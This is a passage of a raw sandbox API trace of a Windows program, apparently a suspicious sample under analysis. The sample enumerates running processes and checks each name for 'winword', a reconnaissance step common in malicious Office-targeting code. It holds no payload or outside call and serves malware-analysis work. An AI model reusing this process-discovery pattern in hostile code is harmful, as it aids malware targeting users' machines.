lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0100.387] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0100.387] StrStrIA (lpFirst="dwm.exe", lpSrch="winword") returned 0x0 [0100.387] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.388] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d530 [0100.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d530, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.388] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.388] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.389] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d4e8 [0100.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d4e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.389] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.389] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.389] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.390] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d500 [0100.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d500, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.390] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.390] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.391] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d548 [0100.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d548, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.391] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.391] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.391] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.392] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d518 [0100.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d518, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.393] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.393] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.394] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d9b0 [0100.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.394] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.394] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.394] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.395] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d848 [0100.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d848, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.395] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.395] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.395] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.396] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d8d8 [0100.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d8d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.396] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.396] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.396] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.397] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d980 [0100.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d980, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.397] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.397] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.397] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.398] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d878 [0100.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d878, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.398] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.398] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.398] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.399] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d860 [0100.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x356d860, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0100.399] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0100.399] StrStrIA (lpFirst="spoolsv.exe", lpSrch="winword") returned 0x0 [0100.399] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.400] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356da10 [0100.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356da10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.400] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.400] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.400] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.401] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d9f8 [0100.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x356d9f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0100.401] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0100.401] StrStrIA (lpFirst="audiodg.exe", lpSrch="winword") returned 0x0 [0100.401] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0100.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.402] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356d998 [0100.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x356d998, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0100.402] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0100.402] StrStrIA (lpFirst="sihost.exe", lpSrch="winword") returned 0x0 [0100.402] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.403] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d9c8 [0100.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356d9c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.403] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.403] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.403] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.404] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356d818 [0100.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356d818, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.404] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.404] StrStrIA (lpFirst="taskhostw.exe", lpSrch="winword") returned 0x0 [0100.405] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.405] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d9e0 [0100.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x356d9e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0100.406] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0100.406] StrStrIA (lpFirst="explorer.exe", lpSrch="winword") returned 0x0 [0100.406] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0100.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.407] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d3a8 [0100.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357d3a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0100.407] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0100.407] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="winword") returned 0x0 [0100.407] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0100.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0100.408] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356bd48 [0100.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356bd48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0100.409] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0100.412] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="winword") returned 0x0 [0100.412] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0100.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.413] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d328 [0100.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357d328, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0100.413] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0100.413] StrStrIA (lpFirst="Memory Compression", lpSrch="winword") returned 0x0 [0100.413] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0100.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.415] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357d3c8 [0100.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357d3c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0100.415] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0100.415] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="winword") returned 0x0 [0100.415] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0100.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.416] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d890 [0100.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x356d890, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0100.416] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0100.416] StrStrIA (lpFirst="SearchUI.exe", lpSrch="winword") returned 0x0 [0100.416] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0100.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.417] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d208 [0100.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357d208, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0100.417] 